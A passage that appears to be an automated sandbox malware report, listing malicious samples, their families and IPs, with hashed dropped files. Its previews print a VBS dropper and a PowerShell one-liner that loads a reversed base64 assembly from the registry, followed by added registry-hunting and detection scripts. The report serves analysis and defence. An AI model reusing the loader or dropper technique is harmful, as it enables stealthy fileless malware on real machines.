 | file.exe | malicious | Amadey, Stealc, Vidar | 172.64.41.3
 | Offer Document.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
 | https://amende-facture.business/ANT | malicious | Unknown | 104.21.17.52
VIVIDHOSTINGUS | SWIFTCOPY202973783.vbe | malicious | AgentTesla | 162.254.34.31
 | D6yz87XjgM.exe | malicious | AgentTesla | 162.254.34.31
 | m68k.elf | malicious | Unknown | 64.190.116.37
 | Urgent Quotation documents One Pdf.vbs | malicious | AgentTesla | 162.254.34.31
 | Ref#150689.vbe | malicious | AgentTesla | 162.254.34.31
 | arm5.elf | malicious | Unknown | 68.64.140.119
 | spc.elf | malicious | Mirai | 216.157.141.60
 | arm.elf | malicious | Mirai | 206.40.174.18
 | Request for Best Price Offer.exe | malicious | AgentTesla | 162.254.34.31
 | EQORY0083009.vbs | malicious | AgentTesla | 162.254.34.31
CLOUDFLARENETUS (listed a second time, same entries) | http://spain.recordsbluemountain.com | malicious | Unknown | 188.114.96.3
 | Fizetes_12112024.jpg.img | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
 | #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253,jpg.img (decoded: Átutalás-megerősítése_469253,jpg.img) | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
 | DEMASI-24-12B DOC. SCAN.exe | malicious | GuLoader, Remcos | 172.67.216.75
 | https://microsoftatacrisuredbathehatcheragency.birchsstreet.net/ | malicious | Unknown | 104.21.29.37
 | Scan_7341292.pdf | malicious | HTMLPhisher | 104.18.95.41
 | https://t.ly/D5x5U | malicious | Braodo | 162.159.61.3
                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                    • 172.64.41.3
                                                    Offer Document.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                    • 188.114.96.3
                                                    https://amende-facture.business/ANTGet hashmaliciousUnknownBrowse
                                                    • 104.21.17.52
Match (JA3 fingerprint) | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Fizetes_12112024.jpg.img | malicious | Snake Keylogger, VIP Keylogger | 104.26.12.205
Átutalás-megerősítése_469253,jpg.img | malicious | Snake Keylogger, VIP Keylogger | 104.26.12.205
file.exe | malicious | Amadey, Stealc, Vidar | 104.26.12.205
Offer Document.exe | malicious | MassLogger RAT, PureLog Stealer | 104.26.12.205
BL New Booking_ 021-34326093HL.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.26.12.205
Malzeme için Görsel Siparişler #PO160924R0 _323282.exe | malicious | VIP Keylogger | 104.26.12.205
6DfHIXhWXp.lnk | malicious | Unknown | 104.26.12.205
YIU6wlOgnJ.lnk | malicious | Unknown | 104.26.12.205
VQSLdElLF9.lnk | malicious | Unknown | 104.26.12.205
whf6kh4bok.lnk | malicious | Unknown | 104.26.12.205
Match: a0e9f5d64349fb13191bc781f81f42e1
file.exe | malicious | Amadey, Stealc, Vidar | 172.67.215.48
Payment advice_USD75,230.18.xls | malicious | Unknown | 172.67.215.48
Scan12112024,pdf.vbs | malicious | Snake Keylogger, VIP Keylogger | 172.67.215.48
file.exe | malicious | LummaC | 172.67.215.48
file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 172.67.215.48
file.exe | malicious | LummaC, Stealc, Vidar | 172.67.215.48
file.exe | malicious | LummaC, Stealc, Vidar | 172.67.215.48
file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 172.67.215.48
file.exe | malicious | LummaC | 172.67.215.48
file.exe | malicious | LummaC | 172.67.215.48
                                                    No context
                                                    Process:C:\Windows\System32\wermgr.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.5345138499493663
                                                    Encrypted:false
                                                    SSDEEP:96:bMFtjSrxYidmRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTA+f/VXT5NHBjE:oDSmGmR30wAAzuiF0Z24lO8
                                                    MD5:A29C9DD7E3D752C7359D7BDD75702762
                                                    SHA1:0F609963814CB9398F49AB97152ECF2814F9D37E
                                                    SHA-256:8630AF3235861FE7464F8688FE82EA5B6F244D71BE09B0E182DBF65638A072A0
                                                    SHA-512:5438A10D80CE3555B006DDC008450606BB1104E5DB18DDD6DF72A0F6B9DB8E33DA8C93343BF2D4FCB542948A7913240D368EEF6EC19DD6A79C4589971256D588
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.8.8.9.0.6.6.0.9.3.1.0.1.8.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.8.8.8.8.6.8.5.9.1.6.8.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.c.d.8.e.b.a.3.-.c.1.4.4.-.4.7.3.5.-.b.8.2.5.-.4.2.7.1.c.2.3.2.3.d.d.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.9.c.-.0.0.0.1.-.0.0.1.4.-.5.5.d.d.-.2.1.2.2.0.0.3.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.
                                                    Process:C:\Windows\System32\wermgr.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):7414
                                                    Entropy (8bit):3.6798207728558885
                                                    Encrypted:false
                                                    SSDEEP:96:RSIU6o7wVetbDDTjxfiUe6YKiqgmfHNV9reHJP5aM95m:R6l7wVeJDDTjZiUe6YKiqgmftq/p95m
                                                    MD5:2098585255E599AFFBE5FDAB5403ECDD
                                                    SHA1:9E92C7CE1485B4DA80A394B9BDED00A79B3D8951
                                                    SHA-256:BEE501A85E1B5B353F87914FFE87E8432ED028B22AC62056C1CEB5F4AC1B3240
                                                    SHA-512:07E0599187C165BCB0D3D13CD1BF8CCD5D0EA1C58745F09584B063CA735FF6801837BEA0309CF71394511CD9535FA3B5E2AC7A30DB44247EC1ADD9F5D6143AA8
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.9.2.<./.P.i.
                                                    Process:C:\Windows\System32\wermgr.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4899
                                                    Entropy (8bit):4.569831397673442
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsoJg771I9b4WpW8VY5Ym8M4JFKlnOtSFAyq8vT0OtS8nytf2gd:uIjfuI7cx7VRJFKlnaWT0ynuf2gd
                                                    MD5:1146B8D5982518AEBCA0F09C4E408639
                                                    SHA1:39AAD39F77B90B693DB418164A7C119F38402DAF
                                                    SHA-256:F84C000AB8FFFF6BF11040FEDB393EF1AC0626B23115A3D844FFF83420E041A9
                                                    SHA-512:AE7D9B70AA9CABE34124F9F7DD545767F3020A9AA9A2D1EE2314054AEC7A203124AE8204ED6931EA02C2C62CB383198D4CB8FB28ADCDAD45CC97B0445502EF0B
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="584863" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):11887
                                                    Entropy (8bit):4.901437212034066
                                                    Encrypted:false
                                                    SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9L:Srib4ZmVoGIpN6KQkj2Fkjh4iUxsNYWd
                                                    MD5:ED30A738A05A68D6AB27771BD846A7AA
                                                    SHA1:6AFCE0F6E39A9A59FF54956E1461F09747B57B44
                                                    SHA-256:17D48B622292E016CFDF0550340FF6ED54693521D4D457B88BB23BD1AE076A31
                                                    SHA-512:183E9ECAF5C467D7DA83F44FE990569215AFDB40B79BCA5C0D2C021228C7B85DF4793E2952130B772EC0896FBFBCF452078878ADF3A380A6D0A6BD00EA6663F2
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):3256
                                                    Entropy (8bit):5.404109340363203
                                                    Encrypted:false
                                                    SSDEEP:96:gEzlHyIFKL2O9qrh7Kf+oRJ5Eo9AdrxwN:V1yt2jrAfRLL2G
                                                    MD5:047B195D3B8C00130835658997B1925D
                                                    SHA1:5F77C7A5F798C4C0253839EBD7554B13987704E3
                                                    SHA-256:B2C2801565403B2348CAF820F20B4B92C8725A5079D5360DAF455E84D28AC1FB
                                                    SHA-512:D1724BE394B214B914A236AC1D55DB17B93669880BB3F71057DCD070AF3062FBFF494ABE085345015FCDF5FE6B11BAE9A19FCD20DC4EB749E13F31CD5565D60D
                                                    Malicious:false
                                                    Preview:@...e...........................................................H..............@-....f.J.|.7h8..q.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):252
                                                    Entropy (8bit):5.438866247103481
                                                    Encrypted:false
                                                    SSDEEP:6:xVwe5ljxsu2xKbLtSXqo83ULgvDoXZuBiA2V0LYGg3FI59:772EtSXqdAJci1V0LYHo
                                                    MD5:754B5295ADED4BB9A70035A56DA441A6
                                                    SHA1:FF3AB4CD8B4364EBE9FFF8392C409FD38013AEA5
                                                    SHA-256:64D32D3B1FA23EC072053EBC6C08F687CA96B894ACB1E5D26316D6F59088CE33
                                                    SHA-512:9D16E0CACD5B1F253345B0B3BD54B5A9BA4EE27A936BA6C3E2DF68442B5265EA5E61F1432BCD7CFE62766011F7C08571876695BB011CAF7C295AFD268F7446C5
                                                    Malicious:false
                                                    Preview:[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\PPJeBFdmEDGXlnL' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('PPJeBFdmEDGXlnL')..Stop-Process -Name conhost -Force..
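The one-liner in the preview above reads a string value from HKCU:\Software\PPJeBFdmEDGXlnL, reverses it, base64-decodes the result and loads it as a .NET assembly, so the second stage never touches disk. The following hunting script is an added example, not part of the Joe Sandbox report or of the sample: it walks the Software hives for string values that decode the same way into a PE image, decodes them without loading them, and hashes (optionally dumps) what it finds. The search roots, the 4096-character minimum length and the DumpDir parameter are illustrative choices; the self-test stub at the end is constructed data, not bytes taken from the report.

```powershell
# Added hunting script, not part of the Joe Sandbox report or of the sample.
# Finds .NET assemblies staged in the registry the way the dropped one-liner
# consumes them: a string value that, reversed and base64-decoded, is a PE image.
# The payload is decoded and hashed, never loaded.
# Roots, MinLength and DumpDir are illustrative choices, not values from the report.

function Test-ReversedBase64Pe {
    param([Parameter(Mandatory)][string]$Value)
    # The loader reverses the stored string before base64-decoding it; mirror that.
    $chars = $Value.ToCharArray()
    [array]::Reverse($chars)
    try { $bytes = [Convert]::FromBase64String(-join $chars) }
    catch { return $null }                     # not base64 after reversal: not this technique
    # Minimal PE sanity check: 'MZ' at offset 0, e_lfanew at 0x3C pointing at 'PE\0\0'.
    if ($bytes.Length -lt 0x40 -or $bytes[0] -ne 0x4D -or $bytes[1] -ne 0x5A) { return $null }
    $peOff = [BitConverter]::ToInt32($bytes, 0x3C)
    if ($peOff -lt 0x40 -or ($peOff + 4) -gt $bytes.Length) { return $null }
    if ($bytes[$peOff] -ne 0x50 -or $bytes[$peOff + 1] -ne 0x45 -or
        $bytes[$peOff + 2] -ne 0 -or $bytes[$peOff + 3] -ne 0) { return $null }
    return $bytes
}

function Find-RegistryStagedAssembly {
    param(
        [string[]]$Roots = @('HKCU:\Software', 'HKLM:\Software'),
        [int]$MinLength = 4096,                # a real assembly encodes to far more than this
        [string]$DumpDir                       # optional: write decoded images here for analysis
    )
    $stringKinds = @('String', 'ExpandString', 'MultiString')
    foreach ($root in $Roots) {
        Get-ChildItem -Path $root -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $key = $_
            foreach ($name in $key.GetValueNames()) {
                if ([string]$key.GetValueKind($name) -notin $stringKinds) { continue }
                $raw = $key.GetValue($name)
                # The sample's loader -joins the value first, so REG_MULTI_SZ staging is covered too.
                $val = if ($raw -is [array]) { -join $raw } else { [string]$raw }
                if ($val.Length -lt $MinLength) { continue }
                $pe = Test-ReversedBase64Pe -Value $val
                if ($null -eq $pe) { continue }
                $sha = [BitConverter]::ToString(
                    [Security.Cryptography.SHA256]::Create().ComputeHash($pe)).Replace('-', '')
                if ($DumpDir) { [IO.File]::WriteAllBytes((Join-Path $DumpDir "$sha.bin"), $pe) }
                [pscustomobject]@{ Key = $key.Name; Value = $name; Bytes = $pe.Length; SHA256 = $sha }
            }
        }
    }
}

# Constructed self-test (not data from the report): a 72-byte 'MZ' stub with a
# 'PE\0\0' signature at 0x40, staged the way the sample stages its payload.
$stub = New-Object byte[] 0x48
$stub[0] = 0x4D; $stub[1] = 0x5A
[BitConverter]::GetBytes([int]0x40).CopyTo($stub, 0x3C)
$stub[0x40] = 0x50; $stub[0x41] = 0x45
$staged = [Convert]::ToBase64String($stub).ToCharArray()
[array]::Reverse($staged)
$decoded = Test-ReversedBase64Pe -Value (-join $staged)
"self-test: decoded $($decoded.Length) bytes (expect 72)"

# Live hunt over the current user's and the machine's Software hives.
Find-RegistryStagedAssembly | Format-Table -AutoSize
```

Run it in the context of the user whose HKCU hive is suspect (HKCU: resolves to the calling user only); HKLM:\Software will throw access-denied on some keys, which the script silently skips. The PE check is deliberately shallow so that packed or truncated stages still surface; anything it reports should be triaged by hash and, if unknown, detonated separately rather than loaded.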
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6222
                                                    Entropy (8bit):3.6936133581898103
                                                    Encrypted:false
                                                    SSDEEP:48:WDLH7CpbU2K+ZtukvhkvklCywrn2k2niWlzHSogZomE2niWlIHSogZoS1:Kz7CaoWkvhkvCCtL2niWYHo2niW9HV
                                                    MD5:BB0E83285D846DE2CE52AF7449ABCBAF
                                                    SHA1:C0F95E6566C859D8914849457A053128FFA9D635
                                                    SHA-256:8FA2C6635C980DAC5EB27DF15CACD0EC670FC121DD44710888BA35918C4E50AC
                                                    SHA-512:4BC2764B62A62723405C5330E57A58C39E6CE4F5C7C3E551ADABDC79EA2C142093D90103A8FF04ADF61DBD08D18A0BA51E88612775A4DAF005926DA780427DC8
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ...d.......]2".5..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....y.[..4....9".5......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSllY.d....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....lY.e..Roaming.@......DWSllY.e....C.....................{...R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSllY.d....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSllY.d....E.......................%.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSllY.d....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSllY.d....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSllY"e....q...........
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6222
                                                    Entropy (8bit):3.6936133581898103
                                                    Encrypted:false
                                                    SSDEEP:48:WDLH7CpbU2K+ZtukvhkvklCywrn2k2niWlzHSogZomE2niWlIHSogZoS1:Kz7CaoWkvhkvCCtL2niWYHo2niW9HV
                                                    MD5:BB0E83285D846DE2CE52AF7449ABCBAF
                                                    SHA1:C0F95E6566C859D8914849457A053128FFA9D635
                                                    SHA-256:8FA2C6635C980DAC5EB27DF15CACD0EC670FC121DD44710888BA35918C4E50AC
                                                    SHA-512:4BC2764B62A62723405C5330E57A58C39E6CE4F5C7C3E551ADABDC79EA2C142093D90103A8FF04ADF61DBD08D18A0BA51E88612775A4DAF005926DA780427DC8
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ...d.......]2".5..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....y.[..4....9".5......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSllY.d....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....lY.e..Roaming.@......DWSllY.e....C.....................{...R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSllY.d....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSllY.d....E.......................%.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSllY.d....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSllY.d....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSllY"e....q...........
                                                    Process:C:\Windows\System32\wscript.exe
                                                    File Type:ISO-8859 text
                                                    Category:dropped
                                                    Size (bytes):2012
                                                    Entropy (8bit):5.053973028894199
                                                    Encrypted:false
                                                    SSDEEP:48:RYuJ3nk3ZOSbrXZgjHVtrzejwPOWg8qhqFTUJZfYR8lBc4+rF:jcOIX67fzy5SqkMNyGc4+R
                                                    MD5:4097C973A71DB17E24573739A029F321
                                                    SHA1:00D4BA0C67A084895C70DD189CF208DA6B28B73C
                                                    SHA-256:6723F6C69D0E2B7D4834D1B47D97D61EF7B9552A23075D16BF98DDEC260447E4
                                                    SHA-512:A73EB26B1ED86201538EC188D2CA572A37D996CDFD58615D464264E8995D46BB2C327CD6965BE3E71A6DC36528D4204982FAE1FD3D454219B1A291AA4C93A7B6
                                                    Malicious:false
                                                    Preview:Option Explicit..' Nombre del proyecto: PPJeBFdmEDGXlnL.' Variables globales.Dim SSH, RWD, CBL.Set SSH = CreateObject("WScript.Shell").RWD = SSH.ExpandEnvironmentStrings("%windir%")..' Inicializaci.n de los par.metros del programa.Sub INP(). CBL = 0.End Sub..' Funci.n para verificar si un proceso espec.fico est. en ejecuci.n.Function PEQ(NPR). Dim SWI, LPA. Set SWI = GetObject("winmgmts:\\.\root\cimv2"). Set LPA = SWI.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & NPR & "'"). . PEQ = (LPA.Count > 0).End Function..' Procedimiento para iniciar PowerShell.Sub IPS(). SSH.Run RWD & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2.End Sub..' Funci.n para buscar un proceso PowerShell en ejecuci.n.Function BPS(). Dim LPR, PAC. Set LPR = GetObject("winmgmts:").InstancesOf("Win32_Process"). . For Each PAC In LPR. If StrComp(PAC.Name, "powershell.exe", vbTextCompare) = 0 Then. Set BPS = PAC. Exit Function. End If.
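The VBS preview above shows the dropper's staging logic: it queries Win32_Process over WMI for a running powershell.exe, starts one if needed, and hands it the registry-loading one-liner that was captured in the PowerShell console history. The rule below is an added detection example, not part of the Joe Sandbox report or of the sample: it runs two checks over process-creation and script-block events, a script host (wscript.exe or cscript.exe) spawning PowerShell, and a script block that combines an in-memory assembly Load, a base64 decode and a registry read under a Software hive. Field names follow the Sysmon event 1 and PowerShell event 4104 naming; the four sample records are constructed, and their process IDs are arbitrary.

```powershell
# Added detection example, not part of the Joe Sandbox report or of the sample.
# Two rules for the chain the dropped VBS preview shows: wscript.exe spawning
# powershell.exe, and a script block that loads a reversed base64 assembly from
# the registry. Event fields (ParentImage, Image, ScriptBlockText) follow the
# Sysmon EID 1 / PowerShell EID 4104 naming; the records below are constructed.

function Test-ScriptHostToPowerShell {
    param([Parameter(Mandatory)]$Event)
    $parent = [IO.Path]::GetFileName($Event.ParentImage).ToLowerInvariant()
    $image  = [IO.Path]::GetFileName($Event.Image).ToLowerInvariant()
    return ($parent -in 'wscript.exe', 'cscript.exe') -and ($image -in 'powershell.exe', 'pwsh.exe')
}

function Test-RegistryAssemblyLoad {
    param([Parameter(Mandatory)][string]$ScriptBlockText)
    # All three pieces of the sample's loader must be present: an in-memory
    # Load, a base64 decode, and a registry read under a Software hive.
    return ($ScriptBlockText -match '\[AppDomain\]::CurrentDomain\.Load') -and
           ($ScriptBlockText -match 'FromBase64String') -and
           ($ScriptBlockText -match '(?i)HK(CU|LM):\\Software')
}

function Invoke-DropperDetection {
    param([object[]]$Events)
    foreach ($e in $Events) {
        if ($e.EventId -eq 1 -and (Test-ScriptHostToPowerShell -Event $e)) {
            [pscustomobject]@{ Rule = 'ScriptHostSpawnsPowerShell'; ProcessId = $e.ProcessId
                               Detail = "$($e.ParentImage) -> $($e.Image)" }
        }
        elseif ($e.EventId -eq 4104 -and (Test-RegistryAssemblyLoad -ScriptBlockText $e.ScriptBlockText)) {
            $n = [Math]::Min(60, $e.ScriptBlockText.Length)
            [pscustomobject]@{ Rule = 'RegistryStagedAssemblyLoad'; ProcessId = $e.ProcessId
                               Detail = $e.ScriptBlockText.Substring(0, $n) }
        }
    }
}

# Constructed sample events (process IDs arbitrary). Two should match, two should not.
$sample = @(
    [pscustomobject]@{ EventId = 1; ProcessId = 1234
        ParentImage = 'C:\Windows\System32\wscript.exe'
        Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' },
    [pscustomobject]@{ EventId = 1; ProcessId = 5678
        ParentImage = 'C:\Windows\explorer.exe'
        Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' },
    [pscustomobject]@{ EventId = 4104; ProcessId = 1234
        ScriptBlockText = "[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\PPJeBFdmEDGXlnL' -Name 's').s | ForEach-Object {`$_[-1..-(`$_.Length)]}))); [b.b]::b('PPJeBFdmEDGXlnL')" },
    [pscustomobject]@{ EventId = 4104; ProcessId = 5678
        ScriptBlockText = "Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'" }
)
Invoke-DropperDetection -Events $sample | Format-Table -AutoSize
```

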